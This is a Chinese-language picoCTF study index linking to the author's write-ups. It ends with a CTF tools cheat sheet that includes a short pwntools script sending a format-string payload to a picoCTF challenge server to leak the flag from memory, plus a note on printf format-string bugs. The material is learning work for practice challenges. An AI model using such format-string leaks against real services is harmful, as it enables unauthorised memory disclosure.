# 從零開始的 picoCTF (RE0:picoCTF) [TOC] ---------------------------------------------------------------------------- ## 記得 ```ls -la``` 有時候會藏東西，用這個指令才看到資料夾內全部的東西 ## picoCTF2025 [picoCTF2025 Write-up](/A1dVPyT1SPG6hxXwXjbtlg) ## picoCTF2024 [picoCTF筆記](https://hackmd.io/e8XhkWRhQZKdX1DP5shufw) ## [picoCTF2023](https://play.picoctf.org/practice?originalEvent=72&page=1) 讚數沒有超過50% 先不看，有毒QQ (2023/04/07) ### General Skills - [chrono-100pt](https://hackmd.io/Aq1KwKm8ScOjhK6tr_AGRQ?both) - [money-ware-100pt](https://hackmd.io/Rj_XJPKSR4GIureej8jofQ?both) - [Permissions-100pt](https://hackmd.io/dGmg8Vi0TJ262w-k8jUbbA?both) - [repetitions-100pt](https://hackmd.io/4kq0tqzFTg2U2d1rOQUqxw?both) ### Web Exploitation - [MatchTheRegex-100pt](https://hackmd.io/RM7lQP1DR2iEC3sE408JOQ?both) - [findme-100pt](https://hackmd.io/KtISCxZ6T-aRv7_WmtxscQ?both) ### Cryptography - [ReadMyCert-100pt](/GxO-p5BTQxqX_0eCnUesIA) - [rotation-100pt](/xu7UOJrySzmFhsJYpeWPMg?both) ### Forensics - [PcapPoisoning-100pt](/BIEqiOoBTlKg47bepmWz4A?both) - [hideme-100pt](/ndljMjYUTK-e0NzV05BI2A) - [who is it-100pt](/MHQlxF-9SoifemgqchvYjQ?both) ### Reverse Engineering - [Reverse-100pt](/R4zubXeGSR-DKEiE7_dImQ?both) - [Safe Opener2-100pt](/KH36Brt2TrioCOKpNPZIyA?both) ### Binary Exploitation - [two-sum-100pt](/DuYD4ufhSW-nXEk8WL1KXw?both) - [hijacking-200pt](/3O3l6RGIQIm42UkDWyQ7Rg?both) ---------------------------------------------------------------------------- ## [picoCTF2022](https://play.picoctf.org/practice?originalEvent=70&page=1) 開新坑喔 (2023/04/11 ### Binary Exploitation - [basic-file-exploit-100pt](/O2pZFhx1QhWj8QFHD8Eycw?both) - [buffer overflow 0-100pt](/uqa2wMikRCGisY8rbMZzFw?both) - [CVE-XXXX-XXXX-100pt](/WNujkM4DSWWBs2bBBY812g?both) - [RPS-200pt](https://hackmd.io/1M7pwnVUS16BcOf9SKfZYg?both) - [Bbbbloat-300pt](https://hackmd.io/wQcoVPFwT5ii-Hgt7Gdxeg?both) - [buffer overflow 1-200pt](https://hackmd.io/nYGsjMrASxmsxshWwrPhLA?both) - [x-sixty-what-200pt](https://hackmd.io/bmQWspprRIWrzGDu1n46Sw?both) - [buffer overflow 2-300pt](https://hackmd.io/9dbnF9YZR42g2vmtirs3pA?both) ### Cryptography - [basic-mod1-100pt](/ZTzcpAM3TpyD6Ppx-aWqVw?both) - [basic-mod2-100pt](/ptziC8e_R8ioFgVBUNW0Lg?both) - [credstuff-100pt](/3rKQto_OQoaBlF7gNC-xmQ?both) - [morse-code-100pt](/KyngQdL_Qbu_wFHBxz5PtA?both) - [rail-fence-100pt](https://hackmd.io/RQdoYaOsSuCXqKeDpvQdjQ?both) - [substitution0-100pt](https://hackmd.io/iJKQgUcPRWGh2oggrjMTig?both) - [substitution1-100pt](/uwB2shRlSOq-7ljzuQ79lg) - [substitution2-100pt](https://hackmd.io/XCG50bH7SduWLCCbo9w63A?both) - [transposition-trial-100pt](https://hackmd.io/JweW0nNiTDufwuM6Fn1qKQ?both) - [Vigenere-100pt](https://hackmd.io/I3tIjfL4R8eWV45ye6Ezmw?both) ### Web Exploitation - [Includes-100pt](https://hackmd.io/yNdXio9RSIuobzW9hbuKxg?both) - [Inspect HTML-100pt](https://hackmd.io/wyn1mOV7SnK-1nS30iA4mA?both) - [Local Authority-100pt](https://hackmd.io/mSdhDNpfQVOMBLUmACetlw?both) - [Search source-100pt](https://hackmd.io/biHGab1OSamUzlTgkAgCmw?both) - [Forbidden Paths-200pt](https://hackmd.io/7BQ9ATQXQvKPzI19KA8Dww?both) - [Power Cookie-200pt](https://hackmd.io/7h2MzDIzTRGumgIC8RMcew?both) - [Roboto Sans-200pt](https://hackmd.io/TasQSrpVT_msWb6BshNp5Q?both) - [secret-200pt](https://hackmd.io/Qqu1vj4kRAO44mc6cRsUnw?both) - [SQL Direct-200pt](https://hackmd.io/Zt9dXtACQsOB2txaUYn0ng?both) ### Forensics - [Enhance!-100pt](/5GZMNlboTPyAipu_UKMGHw?both) - [File types-100pt](/4UZRnyrbRr-tCdKKtC-vWQ?both) - [Lookey here-100pt](/Vh1CYmDtSNuzDIG6XQCDdQ?both) - [Packers Primer-100pt](/qoDj6KuZSESO9kMRDbvQvQ?both) - [Redaction gone wrong-100pt](https://hackmd.io/dMe6_sRPSZyXuXx-dkx49g?both) - [Sleuthkit Intro-100pt](https://hackmd.io/fyVUTrnRQh2teToZCePzpg?both) - [Sleuthkit Apprentice-200pt](https://hackmd.io/hVCMP9lTReKU_B_3uzCx_A?both) - [Eavesdrop-300pt](https://hackmd.io/WYdOQ0E6RDuwyJh8IBevqQ) ### Reverse Engineering - [file-run1-100pt](/19NV8pSiQM6J0Tl5crcbow?both) - [file-run2-100pt](/Mpnfs1ZnQmqTSEYN7JBpXA) - [GDB Test Drive-100pt](/BeaLn_FtRWGRAfmnDa9_7w?both) - [patchme.py-100pt](/tEDc2CrsQKCMTXMI6RA_JQ?both) - [Safe Opener-100pt](https://hackmd.io/SRHrzNQCSo6F2wrP4Xa5ow?both) - [unpackme.py-100pt](https://hackmd.io/6N1twHjcRn2N1MIx191JAA?both) - [bloat.py-200pt](https://hackmd.io/2dN8giXiSOqKBsQFQymR5A?both) - [Fresh Java-200pt](https://hackmd.io/KENMf-mwRBG5KahMrCXaSw?both) ---------------------------------------------------------------------------- ## [Beginner picoMini 2022](https://play.picoctf.org/practice?originalEvent=69&page=1) 2023/03/29完成 ### General Skills - [Codebook-100pt](/VDQzTvIcQlSObIiSfrFMQQ) - [convertme.py-100pt](/6iBnLTbBQ3u8seu6pw9IGA?both) - [fixme1.py-100pt](https://hackmd.io/iS05x-jVSlC6aIyTTTbH-A?both) - [fixme2.py-100pt](https://hackmd.io/7A2O5g56Qqq1tQmBD-vUbA?both) - [Glitch Cat-100pt](https://hackmd.io/CWfcD8f2Tzia93iSc8fGOQ?both) - [PW Crack 1-100pt](https://hackmd.io/m5S4Qx1oR5eC0ZTCdBXqEQ?both) - [PW Crack 2-100pt](https://hackmd.io/JzdYdFEBQ7Ck7_zE_RIExw?both) - [PW Crack 3-100pt](https://hackmd.io/6inwqmEbQayrlwLRwUoZPg?both) - [PW Crack 4-100pt](https://hackmd.io/aXXUYHupTD-nS2rtRl32dw?both) - [PW Crack 5-100pt](https://hackmd.io/OOs4gU0nQLW4L56e0hYC4g?both) - [runme.py-100pt](https://hackmd.io/eNeY9LwDRMSg0BaY1BCx_Q?both) - [Serpentine-100pt](https://hackmd.io/Bd3NznP_ToSs7_Fd7VdFlw) ---------------------------------------------------------------------------- ## [picoMini by redpwn](https://play.picoctf.org/practice?originalEvent=67&page=1) 有夠難解的心累...100pt的怎麼這麼難 (2023/04/06) ### Web Exploitation - [Login-100pt](/iA1FVV9YQ4uooPxOWYNykQ) - [caas-150pt](/9L7-gnoBTUeFYuSuck9tLQ?both) ### Cryptography - [spelling-quiz-100pt](/1BrQkuEVSgeysbTvq2pwUA) ---------------------------------------------------------------------------- ## 好用的工具 ### 基本常識? - [Linux一些指令](/8-UJ_6NYSVWHVYpMrsFBuw) - [字符切割](/N_W7l6T2Qb68N8GkcX7irw) - Crypto [安裝看這個網址](https://bobbyhadz.com/blog/python-no-module-named-crypto) ### Web tools - wfuzz ``` wfuzz [爆破文件絕對位置] --hc 要過濾的字串 URL/FUZZ``` 只能對 http 下手的樣子(待確認) - seclist 有比較多的 dictionary ### rev tools - [java decompiler](http://www.javadecompilers.com/) - Ghidra : 反編譯工具 ### 解碼 [線上解碼](https://the-x.cn/zh-cn/base64) ### 處理圖片 [使用步驟](/uzJvvVlXRjqSiry0qiHMJg) - StegSolve : 用來解(圖片)隱寫術的， LSB(Least Significant Bit) 呼叫工具方式XD ``` java -jar stegsolve.jar ```` 工具長這樣  - binwalk : [不懂看這個](/ndljMjYUTK-e0NzV05BI2A) ```binwalk -e {filename}``` - strings : 可以讀 binary 檔案內容 ```strings [filename] | grep "flagname"``` - exiftool : 檢查圖片檔頭的 EXIF ```exiftool [filename]```  - foremost : 講圖和檔案分離 ```foremost filename.png``` inkscape ### 查 IP [全球Whois查詢](https://www.whois365.com/tw) ### Binary(pwn) - GEF(GBD) [官方網站](https://hugsy.github.io/gef/) 根據官網安裝完後，輸入 ```gdb ./filename```，如下圖  - r(run) : 執行程式 - x function_name : 只會顯示 function 在 memory address (ebdbr64)  - disass function_name : 列出 function 裡面所有執行動作以及 memory address  - pattern create 100 : 產生100個字符  - pattern offset function_name :　列出　function 裡的程式在 memory address - pattern search memeory_address : - pwntools install :　 ``` $ sudo apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential $ python3 -m pip install --upgrade pip $ python3 -m pip install --upgrade pwntools ``` 簡單的 pwn 寫法，題目 : [Stone](https://play.picoctf.org/practice/challenge/105) ```python= from pwn import * r = remote('mercury.picoctf.net',59616) print(r.recvuntil(b'2) View my portfolio\n').decode()) r.sendline(b'1') print(r.recvuntil(b'What is your API token?\n').decode()) r.sendline(b'%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x') print(r.recvline().decode()) s = r.recvline().decode() l = s.split('-') flag = b'' for u in l: u = int(u, base=16) flag += pack(u,32, 'little') print(flag) r.close() ``` - 碎碎念 一般來說 pwn 主要是利用題目的漏洞來拿到 flag，目前看到的題目是用C語言，最常見的漏洞是跟 input/output 相關的，像是 gets() 和 printf()，一般 printf() 輸出的格式是 ```printf(%d, name)```，然而當忘了限制輸出格式時，在 input 時就可以注入多個 ```%x``` 或是 ```%s``` 之類的，讓他 overflow 導致輸出其他 memory 的資料 ###### tags: [`從零開始的 picoCTF`](https://hackmd.io/-KQe DuzrQMOcFNhwU_5eKA?both=) `picoCTF`